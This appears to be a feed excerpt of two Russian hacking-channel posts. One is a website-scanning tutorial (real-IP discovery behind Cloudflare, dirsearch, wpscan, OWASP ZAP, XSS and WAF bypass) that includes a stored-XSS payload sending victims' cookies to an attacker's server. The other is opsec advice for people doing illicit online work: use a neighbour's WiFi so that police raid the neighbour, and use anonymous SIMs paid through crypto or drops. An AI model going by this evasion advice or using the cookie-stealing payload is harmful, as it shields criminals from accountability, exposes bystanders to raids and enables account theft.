</content></entry><entry><id>hack2day:47tNEym555G</id><link rel="alternate" type="text/html" href="https://teletype.in/@hack2day/47tNEym555G?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hack2day"></link><title>Сканируем сайт на уязвимости</title><published>2023-05-14T18:28:42.074Z</published><updated>2023-05-14T18:49:35.336Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img4.teletype.in/files/3d/3d/3d3d0d2b-e1db-4481-9f70-09077f62d349.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img1.teletype.in/files/09/5c/095cb316-4f80-45fd-99ca-968af0bf29ba.png&quot;&gt;Приветствую! Продолжаем нашу работу с Kali Linux. В этот раз мы научимся поверхностно пентестить сайты. Как мы знаем, люди за всю историю Интернета обнаружили огромное количество уязвимостей. Чтобы проверить их всех вручную, придётся потратить не один день. Благо, существуют &quot;WEB Сканеры&quot;, которые автоматически пытаются эксплуатировать все известные накопленные годами уязвимости в наш таргет. Также, мы научимся искать скрытые от посторонних глаз директории, файлы, обходить DDOS защиту и многое другое! Это базовый уровень &quot;скрипт-кидди&quot;, которого вполне хватит для проверки своего сайта. Приятного чтения, дальше — больше! Не забывайте подписываться на наш проект, который создан не ради денег. Будем рады новичкам в чате.</summary><content type="html">
  &lt;p id=&quot;6v10&quot; data-align=&quot;center&quot;&gt;Приветствую! Продолжаем нашу работу с Kali Linux. В этот раз мы научимся поверхностно пентестить сайты. Как мы знаем, люди за всю историю Интернета обнаружили огромное количество уязвимостей. Чтобы проверить их всех вручную, придётся потратить не один день. Благо, существуют &amp;quot;WEB Сканеры&amp;quot;, которые автоматически пытаются эксплуатировать все известные накопленные годами уязвимости в наш таргет. Также, мы научимся искать скрытые от посторонних глаз директории, файлы, обходить DDOS защиту и многое другое! Это базовый уровень &amp;quot;скрипт-кидди&amp;quot;, которого вполне хватит для проверки своего сайта. Приятного чтения, дальше — больше! Не забывайте подписываться на &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;наш проект, который создан не ради денег&lt;/strong&gt;&lt;/a&gt;. Будем рады новичкам &lt;a href=&quot;http://t.me/Hack2day_Chat&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;в чате&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;6kBB&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;&lt;em&gt;ДИС&lt;code&gt;КЛЕЙ&lt;/code&gt;МЕР&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;i7Dw&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;Вся информация, содержащаяся в данной статье, предоставляется исключительно в целях образования и общего информирования. Автор не несет ответственности за любые действия, которые могут быть предприняты на основе этой информации, а также не гарантирует ее полноту, точность или актуальность.&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;03iQ&quot; data-align=&quot;center&quot;&gt;Получение настоящего IP сайта&lt;/h2&gt;
  &lt;p id=&quot;NF8j&quot; data-align=&quot;center&quot;&gt;Сейчас существует много защит от DDoS атак, которые могут помешать нашим тестам. Все они работают по такому принципу: сайт &amp;quot;накрывается&amp;quot; мощностями огромного сервиса, (пр. — Cloudflare, DDoS Guard) цель которого фильтровать ботов и частые запросы. Если мы пройдём проверку на робота = сможем получить возможность взаимодействия с сайтом. Если нет — наш запрос просто проигнорируют. Но, каждый сайт имеет свой личный IP, который 99% не под защитой. То есть, если мы его узнаем, у нас откроется возможность общаться с ним без посредников, напрямую. Сделать можно это многими способами, например: засунуть IP логгер в какой-то обработчик сайта, отправить письмо на несуществующую доменную почту сайта (пр.: nickname@site.com) и вероятно, получить ответ с настоящего IP. Но, не забываем, наш текущий уровень — скрипт-кидди, поэтому будем использовать проверенные и эффективные паблик решения, постепенно повышая свой уровень знаний. Из основных инструментов, могу выделить эти сайты: &lt;a href=&quot;https://dnsdumpster.com/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;DNSDumpster&lt;/strong&gt;&lt;/a&gt;,&lt;strong&gt; &lt;a href=&quot;https://www.criminalip.io/en&quot; target=&quot;_blank&quot;&gt;Criminalip&lt;/a&gt;&lt;/strong&gt;,&lt;strong&gt; &lt;a href=&quot;https://www.shodan.io/&quot; target=&quot;_blank&quot;&gt;Shodan&lt;/a&gt;,&lt;a href=&quot;https://intelx.io/&quot; target=&quot;_blank&quot;&gt;intelx&lt;/a&gt;, &lt;a href=&quot;https://censys.io/&quot; target=&quot;_blank&quot;&gt;Cenys&lt;/a&gt;.&lt;/strong&gt;&lt;/p&gt;
  &lt;figure id=&quot;cykX&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/09/5c/095cb316-4f80-45fd-99ca-968af0bf29ba.png&quot; width=&quot;697&quot; /&gt;
    &lt;figcaption&gt;результат поиска настоящего ip сайта используя DNSDumpster&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Jal5&quot; data-align=&quot;center&quot;&gt;Также, существуют утилиты для дополнительной проверки, одна из них — &lt;a href=&quot;https://github.com/m0rtem/CloudFail&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;CloudFail&lt;/strong&gt;&lt;/a&gt;. К слову, если даже IP не удалось обнаружить, это не повод останавливаться. Мы просто потратим немного больше времени на сканирование.&lt;/p&gt;
  &lt;p id=&quot;MW6a&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;OFcd&quot; data-align=&quot;center&quot;&gt;Поиск скрытых файлов / директорий&lt;/h2&gt;
  &lt;p id=&quot;BdaK&quot; data-align=&quot;center&quot;&gt;Это очень важная часть, которую почему-то многие упускают. Мы можем воспользоваться утилитой dirscan, (по умолчанию установлена в Kali Linux) которая в автоматическом режиме попытается найти открытые директории, скрытые файлы, SQL базы, и очень-очень многое другое на нашем сайте. Использование максимально простоe: &lt;code&gt;$ dirsearch -u ссылка-на-сайт.com&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;s9hm&quot; data-align=&quot;center&quot;&gt;Сканируя разные панели нелегальной тематики мне удавалось находить исходники разных скриптов, которые легко можно было бы продать за &lt;code&gt;~2k$&lt;/code&gt;. Некоторые команды вообще оставляли папку с материалом работников в открытом виде, что теоретически, принесло бы мне путёвку в тёплые места, если бы я был злоумышленником=) Но, это все — фантазии, мы ведь люди честные.&lt;/p&gt;
  &lt;figure id=&quot;JSjZ&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/fa/39/fa39c892-5978-4f67-822f-274e45529e4f.png&quot; width=&quot;693&quot; /&gt;
    &lt;figcaption&gt;поиск скрытых файлов/директорий&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;hC9w&quot; data-align=&quot;center&quot;&gt;Родной брат этой утилиты — &lt;a href=&quot;https://github.com/projectdiscovery/subfinder&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;subfinder&lt;/strong&gt;&lt;/a&gt;. Он помогает перебирать поддомены сайта. Речь о &lt;a href=&quot;https://m.vk.com&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;https://m.vk.com&lt;/strong&gt;&lt;/a&gt; — где &amp;quot;&lt;strong&gt;m.&lt;/strong&gt;&amp;quot; является поддоменом и открывает мобильную версию страницы. Очень, очень много сайтов было взломано только благодаря тому, что админы открывали какой-то поддомен на этапе тестировки и не заботились об защите, тем самым подставляли под угрозу весь сайт целиком. Если вам удалось обнаружить что-то интересное, используйте эти две утилиты в связке, в некоторых случаях даже не приходится производить поиск уязвимостей, когда вся нужная информация буквально открыта. Установка лёгкая, (одна строчка) гайд по использованию есть в официальном репозитории &lt;a href=&quot;https://github.com/projectdiscovery/subfinder&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;GitHub&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;
  &lt;figure id=&quot;WfUj&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/9e/3d/9e3d53ac-d6d6-4591-b154-5376e7ccee6b.png&quot; width=&quot;712&quot; /&gt;
    &lt;figcaption&gt;поиск поддоменов сайта&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;d09p&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;lbt5&quot; data-align=&quot;center&quot;&gt;Сканирование сайта на WordPress&lt;/h2&gt;
  &lt;p id=&quot;EuI0&quot; data-align=&quot;center&quot;&gt;Сейчас каждый третий сайт работает на этом &lt;strong&gt;&lt;em&gt;CMS&lt;/em&gt;&lt;/strong&gt;*. С его помощью можно устанавливать плагины, которые зачастую уязвимы. Чтобы проверить, работает ли сайт на WordPress, достаточно перейти по такой ссылке: &lt;code&gt;ваш-сайт.ru/wp-admin&lt;br /&gt;&lt;/code&gt;В успешном случае мы попадаем на страницу авторизации, если нет — можно не проводить дальнейшие действия. К слову, на некоторых сайтах эта страничка умышленно скрывается/переносится на другой адрес, поэтому перед этим действием желательно просканировать скрытые директории/файлы, которые могут дать нам зацепку. Для поиска уязвимостей в плагинах используется утилита wpscan, которая уже установлена в Kali по умолчанию. Перед началом работы с ней, настоятельно рекомендую получить &lt;code&gt;api&lt;/code&gt; ключ на &lt;a href=&quot;https://wpscan.com/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;официальном сайте&lt;/strong&gt;&lt;/a&gt;, это абсолютно бесплатно. С его помощью, мы сможем произвести более эффективное сканирование. (лимит api ключа: 75 запросов в 24 часа)&lt;br /&gt;После этого, открываем терминал и вводим такую команду. Измените токен.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;saDX&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;wpscan --url https://ваш-сайт.ru --api-token wlxP46r7QDhaTkmHOYFDK9qyZNrRP4&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;figure id=&quot;JEjS&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/46/f9/46f917ef-3916-4a80-9768-97e4b4b8d154.png&quot; width=&quot;701&quot; /&gt;
    &lt;figcaption&gt;поиск уязвимостей в плагинах WordPress&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;5GEG&quot; data-align=&quot;center&quot;&gt;В случае если какой-то плагин уязвим, нам предоставляют ссылку на сайт, где описана угроза и способы её эксплуатации. Также, бывают &amp;quot;ложные обнаружения&amp;quot;, сверяйте уязвимые версии плагинов &amp;amp; текущие.&lt;/p&gt;
  &lt;blockquote id=&quot;oAG5&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;CMS — это система управления, которая позволяет создавать, редактировать и управлять содержимым сайта без необходимости знаний программирования.&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;R2eS&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;FjzS&quot; data-align=&quot;center&quot;&gt;Установка WEB Сканера&lt;/h2&gt;
  &lt;p id=&quot;HKkv&quot; data-align=&quot;center&quot;&gt;Стоит упомянуть, что сейчас сканеров просто огромное количество, их тысячи. По моему опыту, наиболее результативным из бесплатных оказался &lt;strong&gt;&lt;a href=&quot;https://www.zaproxy.org/&quot; target=&quot;_blank&quot;&gt;OWASP&lt;/a&gt; &lt;a href=&quot;https://www.zaproxy.org/&quot; target=&quot;_blank&quot;&gt;ZAP&lt;/a&gt;&lt;/strong&gt;, хоть они все имеют свои плюсы и минусы, как-то сравнивать их будет некорректно. Какой-то лучше ищет xss, какой-то — sql инъекции и все в таком роде. В нашем же случае мы получаем золотую середину. Для установки, потребуется скачать &amp;quot;Installer&amp;quot; с их официального &lt;a href=&quot;https://www.zaproxy.org/download/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;сайта&lt;/strong&gt;&lt;/a&gt;. После загрузки, перейдите в терминал и введите такую команду, указав путь к файлу.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;fGfX&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;$ sudo bash путь-к-загруженому-файлу-.sh&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;figure id=&quot;ljjg&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ae/6e/ae6e15c8-57af-4b1f-9dda-5b121a50411c.png&quot; width=&quot;726&quot; /&gt;
    &lt;figcaption&gt;установка OWASP ZAP&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;SlfQ&quot; data-align=&quot;center&quot;&gt;Если установка прошла успешно, вы сможете найти утилиту в списке всех приложений. После первого запуска нам предложат обновить некоторые модули, на что мы, естественно, соглашаемся. Займет это примерно 5 минут.&lt;/p&gt;
  &lt;p id=&quot;De2d&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;XaFM&quot; data-align=&quot;center&quot;&gt;Ищем уязвимости&lt;/h2&gt;
  &lt;p id=&quot;t4gR&quot; data-align=&quot;center&quot;&gt;В сканере мы выбираем режим &amp;quot;Automated Scan&amp;quot;. Вы встретите поле для ввода сайта и непонятные функции — &amp;quot;Ajax Spider&amp;quot;, &amp;quot;Traditional Spider&amp;quot;. Это своеобразные боты, цель которых стоит в сборе ссылок на сайте, которые будут проверяться сканером на уязвимости. &amp;quot;Традиционный&amp;quot; паук будет черпать ссылки прямиком из HTML кода, &amp;quot;AJAX&amp;quot; — парсит с динамических элементов, которые могут быть доступны только после каких-то действий. (например, нажатие на js кнопку, ожидание на странице и пр.) Соответственно, лучшим вариантом будет использовать сразу два, благо, сканер поддерживает такую работу. Если вы хотите произвести самое глубокое сканирование, вам следует установить параметр глубины на &amp;quot;0&amp;quot;, как показано на скриншоте ниже. (замедлит работу)&lt;br /&gt;(чтобы перейти в эти настройки, нажмите: &lt;strong&gt;Tools --&amp;gt; Options --&amp;gt; AJAX Spider&lt;/strong&gt;)&lt;/p&gt;
  &lt;figure id=&quot;AHte&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/66/3a/663a4239-2e55-45a7-887c-18a8eb8e0c24.png&quot; width=&quot;692.0958083832335&quot; /&gt;
    &lt;figcaption&gt;работа в OWASP ZAP&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ezl5&quot; data-align=&quot;center&quot;&gt;Моим таргетом будет специальный сайт, который был создан специально для теста уязвимостей (&lt;a href=&quot;http://testphp.vulnweb.com/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;http://testphp.vulnweb.com/&lt;/strong&gt;&lt;/a&gt;) — вы также можете попрактиковаться на нём. Нажимаем кнопку &amp;quot;Attack&amp;quot; и наблюдаем за процессом. Скорость зависит от количества спаршенных ссылок и мощности железа. В основном, на проверку одного таргета нужно подождать примерно 15 минут. Можно смотреть результаты в режиме реального времени, нажав на кнопку &amp;quot;Alerts&amp;quot;. К каждой уязвимости прилагается инструкция по эксплуатации, если её не предоставили/ничего не понятно — не составит труда вбить название в поисковики и изучить информацию. Кстати, они делятся на несколько типов и имеют свой цвет: Критичные (красные), средние (оранжевые), слабые (жёлтые). Ещё существуют информативные (синие), многие их автоматически пропускают, но они тоже могут быть важными, особенно если таргет не популярный.&lt;/p&gt;
  &lt;figure id=&quot;kV9T&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a7/3c/a73cd301-ba85-41d8-a1c2-39159b3fedba.png&quot; width=&quot;708&quot; /&gt;
    &lt;figcaption&gt;результат поиска уязвимостей&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Cg5W&quot; data-align=&quot;center&quot;&gt;В моем случае найдено XSS и SQL инъекцию. XSS — это тип атаки, с помощью которой можно внедрить вредоносный код на страницу. Проще говоря, мы буквально можем украсть чужие cookies по ссылке, перекинуть на фишинг с настоящего домена, заменить какую-либо информацию и так далее. SQL инъекция — тип атаки, с помощью которой можно взаимодействовать с базой данных в обход авторизации. Речь о тех самых &amp;quot;дампах&amp;quot;, когда взламывают ресурс и выкачивают информацию. В последствии образуются утечки баз данных. Так как статья не об уязвимостях, мы поверхностно затронем XSS атаку, а SQL инъекцию оставим на отдельный материал, это довольно обширная тема.&lt;/p&gt;
  &lt;p id=&quot;58Ra&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;Soug&quot; data-align=&quot;center&quot;&gt;Немного о XSS атаках&lt;/h2&gt;
  &lt;p id=&quot;tBNw&quot; data-align=&quot;center&quot;&gt;Думаю, стоит начать с того, что их существует 3 вида: рефлективные, хранимые и на основе DOM. Рефлективные — это когда пользователю нужно перейти по какой-то ссылке. Буквально, уязвимость существует, но чтобы с её помощью осуществить атаку, нужно взаимодействовать каким-либо образом с таргетом. В основном, они встречаются в полях для ввода. (пример: магазин с функционалом поиска товаров) Заражённая ссылка будет выглядеть примерно вот так: &lt;code&gt;example.com/search?&amp;lt;script&amp;gt;alert(&amp;quot;HACK2DAY&amp;quot;);&amp;lt;/script&amp;gt;&lt;/code&gt; — если жертва перейдёт по ней, она увидит сообщение с тегом нашего канала. Хранимые — это когда уязвимость можно эксплуатировать прямо в какую-либо страницу. Например: пользователь в VK оставил комментарий под постом с текстом &lt;code&gt;&amp;lt;img src=x onerror=this.scr=&amp;#x27;ваш сервер&amp;#x27;?&amp;#x27;+document.cookie;&amp;gt;&lt;/code&gt; — теперь каждый, кто увидит запись, автоматически отправит свои cookies прямиком злоумышленнику на сервер, я сделаю отдельно об этом статью. Кстати, &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; нужно указывать для того, чтобы сайт воспринимал нашу надпись не как простой текст, а как исполняемый код. На основе DOM идут уже более продвинутые атаки, злоумышленник вставляет вредоносный скрипт в HTML-документ, который уже находится на клиентской стороне и выполняется в браузере пользователя. По сути, такая атака может быть как рефлективной, так и хранимой.&lt;/p&gt;
  &lt;p id=&quot;6Y8p&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;190R&quot; data-align=&quot;center&quot;&gt;Что такое WAF&lt;/h2&gt;
  &lt;p id=&quot;LRRI&quot; data-align=&quot;center&quot;&gt;Если хорошо посмотреть на скриншот со сканера, вы можете заметить что наша xss уязвимость выполняется не в чистом виде, как я описывал выше, а с изменениями. Речь о частях &amp;quot;&lt;code&gt;&amp;lt;/strong&amp;gt;&lt;/code&gt;&amp;quot;, заглавных буквах и так далее. Очевидно, если есть уязвимость, создатели сайта попытаются её устранить. Для этого они ставят на свои ресурсы &amp;quot;WAF&amp;quot;. Это то, что блокирует нежелательные запросы, которые могут подвергнуть сайт к опасности. Наш сканер видоизменил запрос, добавив к нему немного &amp;quot;мусора&amp;quot;, который сбил WAF с толку. По итогу, у нас получилось в обход этой защите произвести нужную атаку. Защита есть практически на каждом сайте, очевидно, что вместо &amp;quot;&lt;code&gt;&amp;lt;/strong&amp;gt;&lt;/code&gt;&amp;quot; как у меня, вы можете встретить рандомные символы, слова и так далее. Не пугайтесь этого.&lt;/p&gt;
  &lt;figure id=&quot;dF6Z&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e2/60/e2602bb3-2411-4a67-aa56-3ef78492c82a.png&quot; width=&quot;688&quot; /&gt;
    &lt;figcaption&gt;пример обхода WAF&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;9v5w&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;GCYa&quot; data-align=&quot;center&quot;&gt;Итоги&lt;/h2&gt;
  &lt;p id=&quot;3uMD&quot; data-align=&quot;center&quot;&gt;Мы научились искать настоящий ip сайта, скрытые файлы, поддомены. Установили сканер и произвели свою первую проверку сайта на уязвимости. Поверхностно затронули XSS атаку, упомянули об WAF. Надеюсь, было интересно узнать новую информацию, не забывайте заходить в &lt;a href=&quot;http://t.me/Hack2day_Chat&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;наш чат&lt;/strong&gt;&lt;/a&gt;. Всем мирного неба!&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;RrPF&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;dea4&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;EHHk&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

</content></entry><entry><id>hack2day:db6iWX_ZrEX</id><link rel="alternate" type="text/html" href="https://teletype.in/@hack2day/db6iWX_ZrEX?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hack2day"></link><title>Создание + настройка системы под работы разных цветов</title><published>2023-05-02T21:30:44.341Z</published><updated>2023-05-02T21:52:58.466Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img1.teletype.in/files/0d/9a/0d9af0d6-6b07-4ce5-a2eb-0aaf25f8e258.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img1.teletype.in/files/02/d1/02d1fe79-0160-4434-81f1-5a5b15d9190c.png&quot;&gt;Приветствую вас в нашем канале. Прочитав до конца, вы сможете обрести тот самый хороший уровень защиты, которым обладает далеко не каждый человек из тёмного сегмента Интернета. Сразу выделяю слова &quot;ХОРОШИЙ УРОВЕНЬ&quot;! После этих действий вас могут найти*, вопрос в том, смогут ли что-то доказать=)
Если вы ещё не с нами — присоединяйтесь в наше сообщество, будем рады каждому новому участнику. Так же, мы создали чат для общения!</summary><content type="html">
  &lt;p id=&quot;oRT5&quot; data-align=&quot;center&quot;&gt;Приветствую вас в нашем канале. Прочитав до конца, вы сможете обрести тот самый хороший уровень защиты, которым обладает далеко не каждый человек из тёмного сегмента Интернета. Сразу выделяю слова &amp;quot;ХОРОШИЙ УРОВЕНЬ&amp;quot;! После этих действий вас могут найти&lt;strong&gt;*&lt;/strong&gt;, вопрос в том, смогут ли что-то доказать=)&lt;br /&gt;Если вы ещё не с нами — &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;присоединяйтесь&lt;/strong&gt;&lt;/a&gt; в наше сообщество, будем рады каждому новому участнику. Так же, мы создали &lt;a href=&quot;http://t.me/Hack2day_Chat&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;чат для общения&lt;/strong&gt;&lt;/a&gt;!&lt;/p&gt;
  &lt;p id=&quot;Lrtu&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;&lt;em&gt;* = сомневаюсь, что такое произойдёт, но упомяну на всякий случай.&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;6kBB&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;&lt;em&gt;ДИС&lt;code&gt;КЛЕЙ&lt;/code&gt;МЕР&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;i7Dw&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;Вся информация, содержащаяся в данной статье, предоставляется исключительно в целях образования и общего информирования. Автор не несет ответственности за любые действия, которые могут быть предприняты на основе этой информации, а также не гарантирует ее полноту, точность или актуальность.&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;cUVD&quot; data-align=&quot;center&quot;&gt;Получение доступа к WiFi соседей&lt;/h2&gt;
  &lt;p id=&quot;x6DA&quot; data-align=&quot;center&quot;&gt;Это очень хитрая уловка, которая сыграет большую роль при &amp;quot;ограблении&amp;quot;. Так как я хочу описать статью как более детально, стоит упомянуть данный разворот событий. Фактически, в случае выявления вашего настоящего IP идёт огромная работа с бумагами, чтобы провести &amp;quot;ограбление&amp;quot; в вашей квартире/доме. Как правило, &amp;quot;злоумышленники&amp;quot; получают разрешение на &amp;quot;проникновение&amp;quot; только в одну точку — место, на которое оформлялись услуги провайдера. В нашем случае это дом соседа. Сразу хочу заострить внимание на том, что по приезду на адрес наше устройство быстро обнаружат в сетке и поймут в чем дело. Но это не страшно, потому что мы имеем право потребовать ознакомление с &amp;quot;бумагами&amp;quot; на &amp;quot;ограбление&amp;quot;, которые гласят о том, что их выдавали явно не на нашу квартиру/дом. Кстати, в подобных ситуациях нужно тщательно сверять даты, часто совершается много ошибок, которые смогут спасти вашу задницу. В подобной ситуации вы должны сразу же вызвать адвоката, не пытайтесь доказывать свои права самостоятельно, если не &amp;quot;подкованы&amp;quot; в этой сфере. Прикрепляю доказательную базу от юриста, который отлично специализируется на тематике &lt;s&gt;киберпреступлений&lt;/s&gt; ограблений и защиты от них=)&lt;br /&gt;Если у вас есть вопросы связанные с законом — обращайтесь: &lt;a href=&quot;https://zelenka.guru/threads/3438075/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;тред на lolzteam&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;
  &lt;figure id=&quot;r4Sw&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/02/d1/02d1fe79-0160-4434-81f1-5a5b15d9190c.png&quot; width=&quot;725.8780487804878&quot; /&gt;
    &lt;figcaption&gt;Вопрос с юридической точки зрения&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;T4O6&quot; data-align=&quot;center&quot;&gt;Естественно, я не нарушаю закон и веду белую деятельность. Помните: взлом WiFi соседей — незаконно. Однако, я могу показать как проверить свою личную сеть на проникновение используя Linux, который мы ставили в прошлой статье. С этим нам поможет утилита &amp;quot;&lt;a href=&quot;https://github.com/v1s1t0r1sh3r3/airgeddon&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;airgeddon&lt;/strong&gt;&lt;/a&gt;&amp;quot;. Я считаю что она лучше всего подходит для своих целей новичку, так как обладает обширным списком атак и лёгкая в восприятии. Тем, кому это интересно — &lt;strong&gt;&lt;a href=&quot;https://youtu.be/md3P0kMSRfc?t=182&quot; target=&quot;_blank&quot;&gt;посмотрите видео от CyberDen&lt;/a&gt;. &lt;/strong&gt;Не вижу смысла переписывать материал, которого и так полно на просторах Интернета.&lt;/p&gt;
  &lt;p id=&quot;vYG5&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;dIDc&quot; data-align=&quot;center&quot;&gt;Дополнение к WiFi&lt;/h2&gt;
  &lt;p id=&quot;rPs5&quot; data-align=&quot;center&quot;&gt;Вы можете воспользоваться WiFi адаптерами от Alfa. Они обладают очень хорошей дальностью и их цена не особо ударит по карману. Сидя дома можно словить сети за 3-5 KM. (как заявляет производитель) Таким образом легко найти открытую точку доступа (кафе, метро, торговые центры, пр.) и слиться с трафиком обычных прохожих. Главное: не покупайте подделки, используйте только проверенные магазины. Сейчас рынок забит предложениями с &amp;quot;оригинальным продуктом&amp;quot;, но на деле, внутренности будут от дешманки за 300 рублей. Альтернативный вариант: использовать 4G модем с симкой. Она должна быть куплена в каком-то переходе и не иметь ничего общего с вами. Пополнять её нужно конфиденциальной криптовалютой/дропом. Чем дальше модем будет от рабочего устройства, тем лучше. Как вариант: открыть ipv6 прокси в каком-то лесу и подключаться к нему через связку сосед + vpn + прокси. Ну, это кому как удобно. Как по мне, обычного соседского WiFi хватает для 90% дел.&lt;/p&gt;
  &lt;p id=&quot;gFIz&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;5z5k&quot; data-align=&quot;center&quot;&gt;Выбор системы&lt;/h2&gt;
  &lt;p id=&quot;B1pT&quot; data-align=&quot;center&quot;&gt;С Windows, очевидно, работать мы не станем. Наша система должна быть безопасной и простой. Тут выбор очевиден — &lt;a href=&quot;https://tails.boum.org/index.en.html&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Tails&lt;/strong&gt;&lt;/a&gt;. Весь трафик проходит через сеть TOR, а сама система не сохраняет никаких данных и имеет открытый исходный код. Да, перезагрузили ПК = получили чистый образ. Сложно ли так работать? В первое время — очень. Но спустя недельку, вы будете вводить пароли с закрытыми глазами. Для полной настройки системы мне требуется около трёх минут, учитывая добавления RDP, авторизации на ресурсах. Мы сможем сохранять программы, закладки браузера и прочие файлы.&lt;/p&gt;
  &lt;figure id=&quot;qKtz&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c1/5c/c15c6bf9-3cfe-4875-b372-815970fc13ac.png&quot; width=&quot;706&quot; /&gt;
    &lt;figcaption&gt;Tails Image&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;4nF9&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
